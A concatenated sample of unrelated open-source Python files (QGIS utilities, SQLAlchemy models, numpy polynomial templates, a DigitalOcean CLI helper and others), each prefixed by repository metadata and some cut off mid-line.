curl_factory=lambda: rapi.testutils.FakeCurl(RapiMock()))
curl = cl._CreateCurl()
self.assertEqual(curl.getopt(pycurl.HTTPAUTH), pycurl.HTTPAUTH_BASIC)
self.assertEqual(curl.getopt(pycurl.USERPWD), "user:pw")
def testInvalidAuth(self):
# No username
self.assertRaises(client.Error, client.GanetiRapiClient,
|
creative-workflow/pi-setup | test.py | Python | mit | 748 | 0.02139 | import sys, unittest, os
sys.path.append(os.path.realpath(os.path.dirname(__file__))+'/lib')
tests_folder = os.path.realpath(os.path.dirname(__file__))+'/tests'
from tests import ConsoleTestRunner
def load_tests(loader, tests, pattern):
suite = unittest.TestSui | te()
pattern='test_*.py'
for dirname, dirnames, filenames in os.walk(tests_folder):
for path in dirnames:
path=dirname+'/'+path
for all_test_suite in unittest.defaultTestLoader.discover(path, pattern=pattern, top_level_dir=path):
for test_suite in all_test_suite:
suite.addTest(test_suite)
return suite
if __name__ == '__main__':
os.environ['ENVIRONMENT'] = | 'test'
unittest.main(verbosity=2, exit=False, testRunner=ConsoleTestRunner)
|
DMS-Aus/Roam | src/roam/api/utils.py | Python | gpl-2.0 | 8,657 | 0.001733 | import collections
import os
import subprocess
import sys
from contextlib import contextmanager
from PyQt5.QtWidgets import QScroller
from qgis.core import QgsProject, QgsFeatureRequest, QgsGeometry, NULL, Qgis, QgsExpressionContext, \
QgsExpressionContextScope, QgsExpression, QgsFeature
from roam.structs import CaseInsensitiveDict
from roam.utils import warning
def update_feature(layer, *features):
"""
Change feature using the data provider skipping the edit buffer for speed.
:param layer: The layer to get the provider from.
:param features: A list of features to update.
:return: True on success or rasies Expection on fail
"""
featuremap = {}
for feature in features:
attrs = {index: value for index, value in enumerate(feature.attributes())}
featuremap[feature.id()] = attrs
passes = layer.dataProvider().changeAttributeValues(featuremap)
if not passes:
raise FeatureSaveException.not_saved(layer.dataProvider().error().message())
def open_keyboard():
"""
Open the system keyboard
"""
if sys.platform == 'win32':
try:
programfiles = os.environ['ProgramW6432']
except KeyError:
programfiles = os.environ['ProgramFiles']
cmd = r'{path}\Common Files\Microsoft Shared\ink\TabTip.exe'.format(path=programfiles)
try:
os.startfile(cmd)
except WindowsError:
import roam.config
roam.config.settings['keyboard'] = False
roam.config.save()
else:
cmd = 'onboard'
subprocess.Popen(cmd)
def layers(layertype=None):
_layers = QgsProject.instance().mapLayers().values()
if layertype is None:
return _layers
else:
return [layer for layer in _layers if layer.type() == layertype]
def layer_by_name(name):
"""
Return a layer from QGIS using its name.
:param name: The name of the layer
:return: A single layer with the given layer name
"""
try:
return layers_by_name(name)[0]
except IndexError as ex:
warning(f"Can't find layer: {name}")
raise ex
def layers_by_name(name):
"""
Return any layers from QGIS using a name.
:param name: The name of the layer
:return: A list of layers with the given layer name
"""
return QgsProject.instance().mapLayersByName(name)
def feature_by_key(layer, key):
"""
Return the feature for the given key
:param layer: The layer to search
:param key: The mapkey to lookup. This is the feature.id() in QGIS.
:return: The feature found using the mapkey. Will throw StopInteration if not found
"""
rq = QgsFeatureRequest(key)
return next(layer.getFeatures(rq))
class FeatureSaveException(Exception):
def __init__(self, title, message, level, timeout=0, moreinfo=None):
super(FeatureSaveException, self).__init__(self, message)
self.title = title
self.level = level
self.timout = timeout
self.moreinfo = moreinfo
if self.moreinfo:
self.message = message + ':' + str(moreinfo)
else:
self.message = message
@classmethod
def not_accepted(cls):
return cls("Form was not accepted", "The form could not be accepted", Qgis.Warning)
@classmethod
def not_saved(cls, errors):
return cls("Error in saving feature",
"There seems to be a error trying to save the feature",
Qgis.Critical,
moreinfo='\n'.join(errors))
@property
def error(self):
"""
Returns a tuple of the error
"""
return (self.title, self.message, self.level, self.timout, self.moreinfo)
class MissingValuesException(FeatureSaveException):
@classmethod
def missing_values(cls, fields):
html = "<ul>"
for field in fields:
html += "<li>{}</li>".format(field)
html += "</ul>"
return cls("Missing fields", "Some fields are still required. <br> {}".format(html), Qgis.Warning, 2)
@contextmanager
def editing(layer):
layer.startEditing()
yield layer
saved = layer.commitChanges()
if not saved:
layer.rollBack()
errors = layer.commitErrors()
raise FeatureSaveException.not_saved(errors)
def values_from_feature(feature, safe_names=False, ordered=False):
def escape(value):
if safe_names:
value = value.replace(" ", "_")
return value
else:
return value
attributes = feature.attributes()
fields = [escape(field.name().lower()) for field in feature.fields()]
if ordered:
return collections.OrderedDict(zip(fields, attributes))
else:
return CaseInsensitiveDict(zip(fields, attributes))
def copy_feature_values(from_feature, to_feature, include_geom=False):
"""
Copy the values from one feature to another. Missing keys are ignored
:param from_feature: Feature to copy from
:param to_feature: Feature to copy to
:param include_geom: default False, if True will copy the feature geometry
:return: A reference to the to_feature
"""
values = values_from_feature(from_feature)
for field, value in values.items():
try:
to_feature[field] = value
except KeyError:
continue
if include_geom:
geom = QgsGeometry(from_feature.geometry())
to_feature.setGeometry(geom)
return to_feature
def nullcheck(value):
"""
Checks if the value is a null type from QGIS ( NOTE: NULL != null for QgsFeature values).
:param value: The value from the QgsFeature which might be a qgis.core.NULL value
:return: None or the value if the value isn't qgis.core.NULL
"""
if value == NULL:
return None
return value
def format_values(fieldnames, valuestore, with_char='\n'):
"""
Format the given fields with with_char for each.
:param fieldnames: A list of fields to format.
:param valuestore: A dict like store of values
"""
value = []
for field in fieldnames:
try:
if nullcheck(valuestore[field]):
value.append(valuestore[field])
except KeyError:
continue
return with_char.join(value)
def install_touch_scroll(widget) -> None:
"""
Install the touch events on a widget so it can scroll with touch events
:param widget: The widget to install the touch events on.
"""
QScroller.grabGesture(widget, QScroller.TouchGesture)
def replace_expression_placeholders(text:str, feature: QgsFeature):
"""
Replace any QGIS expression placeholders in the given string.
:param text: The text to replace the expression values in.
:param feature: The feature to pull any expression values from.
:return: A string with expression values replaced.
"""
return QgsExpression.replaceExpressionText(text, expression_context_for_feature(feature))
def expression_context_for_feature(feature):
"""
Create a new expression context for the given feature.
:param feature:
:return:
"""
context = QgsExpr | essionContext()
scope = QgsExpressionContextScope( | )
context.appendScope(scope)
if feature is not None:
scope.setVariable("roamgeometry", feature.geometry())
context.setFeature(feature)
return context
def new_expression_context(fields=None):
"""
Create a new expression context with the given fields
:param fields: The fields to use on the expression
:return: The new expression context that can be used with QgsExpression
"""
context = expression_context_for_feature(None)
if fields:
context.setFields(fields)
return context
def search_layer(layer, filter, field_list=None, with_geometry=False):
"""
Search the given layer using the given filter. Only return the fields passed in the field_list.
:param layer: The layer to search
:param filter: The filter to apply to the layer to find matching features.
:param field_list: Only return data for the given fields.
:param with_geometry: If True will also |
ribag/ganeti-experiments | test/py/cmdlib/testsupport/__init__.py | Python | gpl-2.0 | 1,827 | 0 | #
#
# Copyright (C) 2013 Google Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
"""Support classes and functions for te | sting the cmdlib module.
"""
from cmdlib.testsupport.cmdlib_testcase import CmdlibTestCase, \
withLockedL | U
from cmdlib.testsupport.config_mock import ConfigMock
from cmdlib.testsupport.iallocator_mock import patchIAllocator
from cmdlib.testsupport.livelock_mock import LiveLockMock
from cmdlib.testsupport.utils_mock import patchUtils
from cmdlib.testsupport.netutils_mock import patchNetutils, HostnameMock
from cmdlib.testsupport.processor_mock import ProcessorMock
from cmdlib.testsupport.rpc_runner_mock import CreateRpcRunnerMock, \
RpcResultsBuilder
from cmdlib.testsupport.ssh_mock import patchSsh
from cmdlib.testsupport.wconfd_mock import WConfdMock
__all__ = ["CmdlibTestCase",
"withLockedLU",
"ConfigMock",
"CreateRpcRunnerMock",
"HostnameMock",
"patchIAllocator",
"patchUtils",
"patchNetutils",
"patchSsh",
"ProcessorMock",
"RpcResultsBuilder",
"LiveLockMock",
"WConfdMock",
]
|
tingelst/pymanopt | pymanopt/tools/multi.py | Python | bsd-3-clause | 2,443 | 0.000819 | import numpy as np
def multiprod(A, B):
"""
Inspired by MATLAB multiprod function by Paolo de Leva. A and B are
assumed to be arrays containing M matrices, that is, A and B have
dimensions A: (M, N, P), B:(M, P, Q). multiprod multiplies each matrix
in A with the corresponding matrix in B, using matrix multiplication.
so multiprod(A, B) has dimensions (M, N, Q).
"""
# First check if we have been given just one matrix
if len(np.shape(A)) == 2:
return np.dot(A, B)
# Old (slower) implementation:
# a = A.reshape(np.hstack([np.shape(A), [1]]))
# b = B.reshape(np.hstack([[np.shape(B)[0]], [1], np.shape(B)[1:]]))
# | return np.sum(a * b, axis=2)
# Approx 5x faster, only supported by numpy version >= 1.6:
return np.einsum('ijk,ikl->ijl', A, B)
def multitransp(A):
"""
Inspired by MATLAB multitransp function by Paolo de Leva. A is assumed to
be an array containing M matrices, each of which has dimension N x P.
That is, A is an M x N x P array. Mu | ltitransp then returns an array
containing the M matrix transposes of the matrices in A, each of which
will be P x N.
"""
# First check if we have been given just one matrix
if A.ndim == 2:
return A.T
return np.transpose(A, (0, 2, 1))
def multisym(A):
# Inspired by MATLAB multisym function by Nicholas Boumal.
return 0.5 * (A + multitransp(A))
def multiskew(A):
# Inspired by MATLAB multiskew function by Nicholas Boumal.
return 0.5 * (A - multitransp(A))
def multieye(k, n):
# Creates a k x n x n array containing k (n x n) identity matrices.
return np.tile(np.eye(n), (k, 1, 1))
def multilog(A, pos_def=False):
if not pos_def:
raise NotImplementedError
# Computes the logm of each matrix in an array containing k positive
# definite matrices. This is much faster than scipy.linalg.logm even
# for a single matrix. Could potentially be improved further.
l, v = np.linalg.eigh(A)
l = np.expand_dims(np.log(l), axis=-1)
return multiprod(v, l * multitransp(v))
def multiexp(A, sym=False):
if not sym:
raise NotImplementedError
# Compute the expm of each matrix in an array of k symmetric matrices.
# Sometimes faster than scipy.linalg.expm even for a single matrix.
l, v = np.linalg.eigh(A)
l = np.expand_dims(np.exp(l), axis=-1)
return multiprod(v, l * multitransp(v))
|
eternnoir/pyTelegramBotAPI | telebot/storage/__init__.py | Python | gpl-2.0 | 381 | 0.007874 | from telebo | t.storage.memory_storage import StateMemoryStorage
from telebot.storage.redis_storage import StateRedisStorage
from telebot.storage.pickle_storage import StatePickleStorage
from telebot.storage.base_storage import StateContext,StateStorag | eBase
__all__ = [
'StateStorageBase', 'StateContext',
'StateMemoryStorage', 'StateRedisStorage', 'StatePickleStorage'
] |
kevgliss/lemur | lemur/models.py | Python | apache-2.0 | 8,273 | 0.007494 | """
.. module: lemur.models
:platform: Unix
:synopsis: This module contains all of the associative tables
that help define the many to many relationships established in Lemur
:copyright: (c) 2015 by Netflix Inc., see AUTHORS for more
:license: Apache, see LICENSE for more details.
.. moduleauthor:: Kevin Glisson <kglisson@netflix.com>
"""
from sqlalchemy import Column, Integer, ForeignKey, Index, UniqueConstraint
from lemur.database import db
certificate_associations | = db.Table('certificate_associations',
Column('domain_id', Integer | , ForeignKey('domains.id')),
Column('certificate_id', Integer, ForeignKey('certificates.id'))
)
Index('certificate_associations_ix', certificate_associations.c.domain_id, certificate_associations.c.certificate_id)
certificate_destination_associations = db.Table('certificate_destination_associations',
Column('destination_id', Integer,
ForeignKey('destinations.id', ondelete='cascade')),
Column('certificate_id', Integer,
ForeignKey('certificates.id', ondelete='cascade'))
)
Index('certificate_destination_associations_ix', certificate_destination_associations.c.destination_id, certificate_destination_associations.c.certificate_id)
certificate_source_associations = db.Table('certificate_source_associations',
Column('source_id', Integer,
ForeignKey('sources.id', ondelete='cascade')),
Column('certificate_id', Integer,
ForeignKey('certificates.id', ondelete='cascade'))
)
Index('certificate_source_associations_ix', certificate_source_associations.c.source_id, certificate_source_associations.c.certificate_id)
certificate_notification_associations = db.Table('certificate_notification_associations',
Column('notification_id', Integer,
ForeignKey('notifications.id', ondelete='cascade')),
Column('certificate_id', Integer,
ForeignKey('certificates.id', ondelete='cascade')),
Column('id', Integer, primary_key=True, autoincrement=True),
UniqueConstraint('notification_id', 'certificate_id', name='uq_dest_not_ids')
)
Index('certificate_notification_associations_ix', certificate_notification_associations.c.notification_id, certificate_notification_associations.c.certificate_id)
certificate_replacement_associations = db.Table('certificate_replacement_associations',
Column('replaced_certificate_id', Integer,
ForeignKey('certificates.id', ondelete='cascade')),
Column('certificate_id', Integer,
ForeignKey('certificates.id', ondelete='cascade'))
)
Index('certificate_replacement_associations_ix', certificate_replacement_associations.c.replaced_certificate_id, certificate_replacement_associations.c.certificate_id)
roles_authorities = db.Table('roles_authorities',
Column('authority_id', Integer, ForeignKey('authorities.id')),
Column('role_id', Integer, ForeignKey('roles.id'))
)
Index('roles_authorities_ix', roles_authorities.c.authority_id, roles_authorities.c.role_id)
roles_certificates = db.Table('roles_certificates',
Column('certificate_id', Integer, ForeignKey('certificates.id')),
Column('role_id', Integer, ForeignKey('roles.id'))
)
Index('roles_certificates_ix', roles_certificates.c.certificate_id, roles_certificates.c.role_id)
roles_users = db.Table('roles_users',
Column('user_id', Integer, ForeignKey('users.id')),
Column('role_id', Integer, ForeignKey('roles.id'))
)
Index('roles_users_ix', roles_users.c.user_id, roles_users.c.role_id)
policies_ciphers = db.Table('policies_ciphers',
Column('cipher_id', Integer, ForeignKey('ciphers.id')),
Column('policy_id', Integer, ForeignKey('policy.id')))
Index('policies_ciphers_ix', policies_ciphers.c.cipher_id, policies_ciphers.c.policy_id)
pending_cert_destination_associations = db.Table('pending_cert_destination_associations',
Column('destination_id', Integer,
ForeignKey('destinations.id', ondelete='cascade')),
Column('pending_cert_id', Integer,
ForeignKey('pending_certs.id', ondelete='cascade'))
)
Index('pending_cert_destination_associations_ix', pending_cert_destination_associations.c.destination_id, pending_cert_destination_associations.c.pending_cert_id)
pending_cert_notification_associations = db.Table('pending_cert_notification_associations',
Column('notification_id', Integer,
ForeignKey('notifications.id', ondelete='cascade')),
Column('pending_cert_id', Integer,
ForeignKey('pending_certs.id', ondelete='cascade'))
)
Index('pending_cert_notification_associations_ix', pending_cert_notification_associations.c.notification_id, pending_cert_notification_associations.c.pending_cert_id)
pending_cert_source_associations = db.Table('pending_cert_source_associations',
Column('source_id', Integer,
ForeignKey('sources.id', ondelete='cascade')),
Column('pending_cert_id', Integer,
ForeignKey('pending_certs.id', ondelete='cascade'))
)
Index('pending_cert_source_associations_ix', pending_cert_source_associations.c.source_id, pending_cert_source_associations.c.pending_cert_id)
pending_cert_replacement_associations = db.Table('pending_cert_replacement_associations',
Column('replaced_certificate_id', Integer,
ForeignKey('certificates.id', ondelete='cascade')),
Column('pending_cert_id', Integer,
ForeignKey('pending_certs.id', ondelete='cascade'))
)
Index('pending_cert_replacement_associations_ix', pending_cert_replacement_associations.c.replaced_certificate_id, pending_cert_replacement_associations.c.pending_cert_id)
pending_cert_role_associations = db.Table('pending_cert_role_associations',
Column('pending_cert_id', Integer, ForeignKey('pending_certs.id')),
Column('role_id', Integer, ForeignKey('roles.id'))
)
Index('pending_cert_role_associations_ix', |
teoliphant/numpy-refactor | numpy/polynomial/polytemplate.py | Python | bsd-3-clause | 21,267 | 0.000094 | """
Template for the Chebyshev and Polynomial classes.
This module houses a Python string module Template object (see, e.g.,
http://docs.python.org/library/string.html#template-strings) used by
the `polynomial` and `chebyshev` modules to implement their respective
`Polynomial` and `Chebyshev` classes. It provides a mechanism for easily
creating additional specific polynomial classes (e.g., Legendre, Jacobi,
etc.) in the future, such that all these classes will have a common API.
"""
import string
import sys
if sys.version_info[0] >= 3:
rel_import = "from . import"
else:
rel_import = "import"
polytemplate = string.Template('''
from __future__ import division
REL_IMPORT polyutils as pu
import numpy as np
class $name(pu.PolyBase) :
"""A $name series class.
Parameters
----------
coef : array_like
$name coefficients, in increasing order. For example,
``(1, 2, 3)`` implies ``P_0 + 2P_1 + 3P_2`` where the
``P_i`` are a graded polynomial basis.
domain : (2,) array_like
Domain to use. The interval ``[domain[0], domain[1]]`` is mapped to
the interval ``$domain`` by shifting and scaling.
Attributes
----------
coef : (N,) array
$name coefficients, from low to high.
domain : (2,) array_like
Domain that is mapped to ``$domain``.
Class Attributes
----------------
maxpower : int
Maximum power allowed, i.e., the largest number ``n`` such that
``p(x)**n`` is allowed. This is to limit runaway polynomial size.
domain : (2,) ndarray
Default domain of the class.
Notes
-----
It is important to specify the domain for many uses of graded polynomial,
for instance in fitting data. This is because many of the important
properties of the polynomial basis only hold in a specified interval and
thus the data must be mapped into that domain in order to benefit.
Examples
--------
"""
# Limit runaway size. T_n^m has degree n*2^m
maxpower = 16
# Default domain
domain = np.array($domain)
# Don't let participate in array operations. Value doesn't matter.
__array_priority__ = 0
def __init__(self, coef, domain=$domain) :
[coef, domain] = pu.as_series([coef, domain], trim=False)
if len(domain) != 2 :
raise ValueError("Domain has wrong number of elements.")
self.coef = coef
self.domain = domain
def __repr__(self):
format = "%s(%s, %s)"
coef = repr(self.coef)[6:-1]
domain = repr(self.domain)[6:-1]
return format % ('$name', coef, domain)
def __str__(self) :
format = "%s(%s, %s)"
return format % ('$nick', str(self.coef), str(self.domain))
# Pickle and copy
def __getstate__(self) :
ret = self.__dict__.copy()
ret['coef'] = self.coef.copy()
ret['domain'] = self.domain.copy()
return ret
def __setstate__(self, dict) :
self.__dict__ = dict
# Call
def __call__(self, arg) :
off, scl = pu.mapparms(self.domain, $domain)
arg = off + scl*arg
return ${nick}val(arg, self.coef)
def __iter__(self) :
return iter(self.coef)
def __len__(self) :
return len(self.coef)
# Numeric properties.
def __neg__(self) :
retur | n self.__class__(-self.coef, self.domain)
def __pos__(self) :
return self
def __add__(self, other) :
"""Returns sum"""
if isinstance(other, self.__class__) :
if np.all(self.domain == other.domai | n) :
coef = ${nick}add(self.coef, other.coef)
else :
raise PolyDomainError()
else :
try :
coef = ${nick}add(self.coef, other)
except :
return NotImplemented
return self.__class__(coef, self.domain)
def __sub__(self, other) :
"""Returns difference"""
if isinstance(other, self.__class__) :
if np.all(self.domain == other.domain) :
coef = ${nick}sub(self.coef, other.coef)
else :
raise PolyDomainError()
else :
try :
coef = ${nick}sub(self.coef, other)
except :
return NotImplemented
return self.__class__(coef, self.domain)
def __mul__(self, other) :
"""Returns product"""
if isinstance(other, self.__class__) :
if np.all(self.domain == other.domain) :
coef = ${nick}mul(self.coef, other.coef)
else :
raise PolyDomainError()
else :
try :
coef = ${nick}mul(self.coef, other)
except :
return NotImplemented
return self.__class__(coef, self.domain)
def __div__(self, other):
# set to __floordiv__ /.
return self.__floordiv__(other)
def __truediv__(self, other) :
# there is no true divide if the rhs is not a scalar, although it
# could return the first n elements of an infinite series.
# It is hard to see where n would come from, though.
if isinstance(other, self.__class__) :
if len(other.coef) == 1 :
coef = div(self.coef, other.coef)
else :
return NotImplemented
elif np.isscalar(other) :
coef = self.coef/other
else :
return NotImplemented
return self.__class__(coef, self.domain)
def __floordiv__(self, other) :
"""Returns the quotient."""
if isinstance(other, self.__class__) :
if np.all(self.domain == other.domain) :
quo, rem = ${nick}div(self.coef, other.coef)
else :
raise PolyDomainError()
else :
try :
quo, rem = ${nick}div(self.coef, other)
except :
return NotImplemented
return self.__class__(quo, self.domain)
def __mod__(self, other) :
"""Returns the remainder."""
if isinstance(other, self.__class__) :
if np.all(self.domain == other.domain) :
quo, rem = ${nick}div(self.coef, other.coef)
else :
raise PolyDomainError()
else :
try :
quo, rem = ${nick}div(self.coef, other)
except :
return NotImplemented
return self.__class__(rem, self.domain)
def __divmod__(self, other) :
"""Returns quo, remainder"""
if isinstance(other, self.__class__) :
if np.all(self.domain == other.domain) :
quo, rem = ${nick}div(self.coef, other.coef)
else :
raise PolyDomainError()
else :
try :
quo, rem = ${nick}div(self.coef, other)
except :
return NotImplemented
return self.__class__(quo, self.domain), self.__class__(rem, self.domain)
def __pow__(self, other) :
try :
coef = ${nick}pow(self.coef, other, maxpower = self.maxpower)
except :
raise
return self.__class__(coef, self.domain)
def __radd__(self, other) :
try :
coef = ${nick}add(other, self.coef)
except :
return NotImplemented
return self.__class__(coef, self.domain)
def __rsub__(self, other):
try :
coef = ${nick}sub(other, self.coef)
except :
return NotImplemented
return self.__class__(coef, self.domain)
def __rmul__(self, other) :
try :
coef = ${nick}mul(other, self.coef)
except :
return NotImplemented
return self.__class__(coef, self.domain)
def __rdiv__(self, other):
# set to __floordiv__ /.
return self.__rfloordiv__(other)
def __rtruediv__(self, other) :
# there is no true divide if the rhs is not a scalar, although it
# could return the first n elements of an infinite series.
# It is hard to see where n would come from, th |
atlefren/beerdatabase | web/models.py | Python | mit | 13,140 | 0 | # -*- coding: utf-8 -*-
import json
import sqlalchemy as sa
from sqlalchemy.orm import relationship
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.types import UserDefinedType
from flask.ext.jsontools import JsonSerializableBase
from util import ratebeer_url
Base = declarative_base(cls=(JsonSerializableBase,))
class BeerStyle(Base):
__tablename__ = 'style'
id = sa.Column('id', sa.Integer, primary_key=True)
name = sa.Column('name', sa.U | nicode(255))
class RatebeerCountry(Base):
__tablename__ = 'rb_countries'
id = sa.Column('id', sa.Integer, primary_key=True)
name = sa.Column('name', sa.Unicode(255))
class Country(Base):
__tablename__ = 'countries_no'
rb_id = sa.Column('rb_id', sa.Integer, primary_key=True)
name = sa.Column('name', sa.Unicode(255 | ))
iso_code = sa.Column('iso_code', sa.Unicode(2))
def serialize(self, extra_data=None):
serialized = {
'rb_id': self.rb_id,
'name': self.name,
'iso_code': self.iso_code
}
if isinstance(extra_data, dict):
serialized.update(extra_data)
return serialized
class RatebeerBeer(Base):
__tablename__ = 'rb_beer'
id = sa.Column('id', sa.Integer, primary_key=True)
name = sa.Column('name', sa.Unicode(255))
shortname = sa.Column('shortname', sa.Unicode(255))
alias = sa.Column('alias', sa.Boolean)
retired = sa.Column('retired', sa.Boolean)
style_id = sa.Column('style_id', sa.Integer, sa.ForeignKey('style.id'))
style = relationship('BeerStyle', lazy=False)
score_overall = sa.Column('score_overall', sa.Float)
score_style = sa.Column('score_style', sa.Float)
abv = sa.Column('abv', sa.Float)
ibu = sa.Column('ibu', sa.Float)
brewery_id = sa.Column(
'brewery_id',
sa.Integer,
sa.ForeignKey('rb_brewery.id'),
nullable=False
)
brewery = relationship('RatebeerBrewery', lazy=False)
pol_beers = relationship(
'PoletBeer',
lazy=False,
back_populates='ratebeer'
)
def __init__(self):
pass
@property
def url(self):
return ratebeer_url(self.id, self.shortname)
def serialize(self):
return {
'id': self.id,
'name': self.name,
'shortname': self.shortname,
'alias': self.alias,
'retired': self.retired,
'style_id': self.style_id,
'style': self.style,
'score_overall': self.score_overall,
'score_style': self.score_style,
'abv': self.abv,
'ibu': self.ibu,
'url': self.url,
'brewery': self.brewery,
}
def get_list_response(self, extra_data=None):
pol_beer = self.pol_beers[0] if len(self.pol_beers) > 0 else None
res = {
'name': self.name,
'brewery': self.brewery.name,
'brewery_id': self.brewery.id,
'style': self.style.name,
'style_id': self.style.id,
'abv': self.abv,
'price': pol_beer.price if pol_beer else None,
'score_overall': self.score_overall,
'score_style': self.score_style,
'has_rb': True,
'id': self.id,
'pol_id': pol_beer.id if pol_beer else None,
}
if isinstance(extra_data, dict):
res.update(extra_data)
return res
class RatebeerBrewery(Base):
__tablename__ = 'rb_brewery'
id = sa.Column('id', sa.Integer, primary_key=True)
name = sa.Column('name', sa.Unicode(255))
country_id = sa.Column(
'country',
sa.Integer,
sa.ForeignKey('countries_no.rb_id')
)
country = relationship('Country', lazy=False)
subregion = sa.Column('subregion', sa.Integer)
city = sa.Column('city', sa.Unicode(255))
def __init__(self):
pass
def get_list_response(self, count=None):
return {
'id': self.id,
'name': self.name,
'country': self.country,
'num_beers_polet': count
}
class PoletBeer(Base):
__tablename__ = 'pol_beer'
id = sa.Column('id', sa.Integer, primary_key=True)
name = sa.Column('name', sa.Unicode(255))
store_category = sa.Column('store_category', sa.Unicode(100))
produktutvalg = sa.Column('produktutvalg', sa.Unicode(100))
producer = sa.Column('producer', sa.Unicode(100))
distributor = sa.Column('distributor', sa.Unicode(100))
varenummer = sa.Column('varenummer', sa.BigInteger)
abv = sa.Column('abv', sa.Float)
volume = sa.Column('volume', sa.Float)
color = sa.Column('color', sa.Unicode(100))
smell = sa.Column('smell', sa.Unicode(100))
taste = sa.Column('taste', sa.Unicode(100))
method = sa.Column('method', sa.Unicode(255))
cork_type = sa.Column('cork_type', sa.Unicode(100))
packaging_type = sa.Column('packaging_type', sa.Unicode(100))
price = sa.Column('price', sa.Float)
country = sa.Column('country', sa.Unicode(100))
district = sa.Column('district', sa.Unicode(100))
subdistrict = sa.Column('subdistrict', sa.Unicode(100))
url = sa.Column('url', sa.Unicode(100))
vintage = sa.Column('vintage', sa.Unicode(100))
ingredients = sa.Column('ingredients', sa.Unicode(255))
pairs_with_1 = sa.Column('pairs_with_1', sa.Unicode(255))
pairs_with_2 = sa.Column('pairs_with_2', sa.Unicode(255))
pairs_with_3 = sa.Column('pairs_with_3', sa.Unicode(255))
storage_notes = sa.Column('storage_notes', sa.Unicode(255))
sweetness = sa.Column('sweetness', sa.Integer)
freshness = sa.Column('freshness', sa.Integer)
bitterness = sa.Column('bitterness', sa.Integer)
richness = sa.Column('richness', sa.Integer)
ratebeer_id = sa.Column(
'ratebeer_id',
sa.Integer,
sa.ForeignKey('rb_beer.id'),
nullable=True
)
ratebeer = relationship(
'RatebeerBeer',
lazy=False,
back_populates='pol_beers'
)
def __init__(self):
pass
def get_list_response(self, extra_data=None):
has_rb = self.ratebeer is not None
res = {
'name': self.ratebeer.name if has_rb else self.name,
'brewery': self.ratebeer.brewery.name if has_rb else self.producer,
'brewery_id': self.ratebeer.brewery.id if has_rb else None,
'style': self.ratebeer.style.name if has_rb else None,
'style_id': self.ratebeer.style.id if has_rb else None,
'abv': self.ratebeer.abv if has_rb else None,
'price': self.price,
'score_overall': self.ratebeer.score_overall if has_rb else None,
'score_style': self.ratebeer.score_style if has_rb else None,
'has_rb': has_rb,
'id': self.id,
}
if isinstance(extra_data, dict):
res.update(extra_data)
return res
def serialize(self):
return {
'id': self.id,
'name': self.name,
'store_category': self.store_category,
'produktutvalg': self.produktutvalg,
'producer': self.producer,
'distributor': self.distributor,
'varenummer': self.varenummer,
'abv': self.abv,
'volume': self.volume,
'color': self.color,
'smell': self.smell,
'taste': self.taste,
'method': self.method,
'cork_type': self.cork_type,
'packaging_type': self.packaging_type,
'price': self.price,
'country': self.country,
'district': self.district,
'subdistrict': self.subdistrict,
'url': self.url,
'vintage': self.vintage,
'ingredients': self.ingredients,
'pairs_with_1': self.pairs_with_1,
'pairs_with_2': self.pairs_with_2,
'pairs_with_3': self.pairs_with_3,
'storage_notes': self.storage_notes,
'sweetness': self.sweetness,
'freshness': self.freshness,
'bitterness': self.bitterness,
'richness': se |
mvanorder/dosh | doshlib/commands/__init__.py | Python | mit | 2,196 | 0.015027 | import doshlib
import pprint
import dateutil.parser as dp
def help(command):
print "listdroplets"
print "dropletup <droplet ID>"
print "dropletdown <droplet ID>"
print "dropletsnapshots <droplet ID>"
def invalid(command):
print "Invalid command: " + command
def listdroplets(args):
result = doshlib.client.droplets.all()
row = ['ID','Name','Status']
print("{: >10} {: >40} {: >10}".format(*row))
for i in result['droplets']:
row = [i | ['id'],i['name'],i['status']]
| print("{: >10} {: >40} {: >10}".format(*row))
def rebootdroplet(command):
print('not implimented yet')
def dropletup(command):
droplet_id = int(command.split()[1])
if doshlib.isdroplet(int(droplet_id)):
status = doshlib.client.droplets.get(droplet_id)['droplet']['status']
if status == 'off':
result = doshlib.client.droplets.power_on(droplet_id)
print result
else:
print "Droplet is currently on. Please power it off to run this event."
else:
print "Invalid droplet ID:",droplet_id
def dropletdown(command):
droplet_id = int(command.split()[1])
if doshlib.isdroplet(int(droplet_id)):
status = doshlib.client.droplets.get(droplet_id)['droplet']['status']
if status == 'off':
print "Droplet is alreday off."
else:
result = doshlib.client.droplets.power_off(droplet_id)
print result
else:
print "Invalid droplet ID:",droplet_id
def dropletsnapshots(command):
droplet_id = int(command.split()[1])
if doshlib.isdroplet(int(droplet_id)):
snapshots = doshlib.client.droplets.get_droplet_snapshots(droplet_id)['snapshots']
row = ['Created at','Disto','ID','Min disk size','Name','Public','Regions']
print("{: >20} {: >10} {: >10} {: >15} {: >20} {: >10} {: >10}".format(*row))
for i in snapshots:
row = [str(dp.parse(i['created_at'])),i['distribution'],i['id'],i['min_disk_size'],i['name'],i['public'],i['regions']]
print("{: >20} {: >10} {: >10} {: >15} {: >20} {: >10} {: >10}".format(*row))
else:
print "Invalid droplet ID:",droplet_id
|
morris254/polymode | Polymode/ExternalSolvers.py | Python | gpl-3.0 | 14,250 | 0.009614 | # _*_ coding=utf-8 _*_
"""
Solver class to interface with JCMsuite
"""
import os,sys,logging
import Waveguide, Modes
from numpy import *
from .Solver import Solve
class JCMWaveSolver(Solve):
'''
External solver class for the JCMSuite solvers
supply the project_path where the files for the solver will be created
and the main_path where the JCMsuite is installed
'''
jcmwave = None
numthreads = 1
shape_refinement = 3
wg_domain_refinement = 3
grid_refinements = 1
fem_degree = 3
path = "."
results_path = "project_results"
layout_filename = "layout.jcm"
material_filename = "materials.jcm"
triangulator_filename = "triangulator.jcm"
project_filename = "project.jcmp"
def __init__(self, wg, project_path=".", main_path=None, numthreads=1):
self.path = project_path
self.numthreads = numthreads
#Check path
if not (os.path.isdir(project_path) and os.access(project_path, os.W_OK)):
logging.error("Project path does not exist!")
#Append python path if specified
if main_path is not None:
sys.path.append(os.path.join(main_path,"ThirdPartySupport/Python"))
#Try to load the JCM python interface
try:
self.jcmwave = __import__("jcmwave")
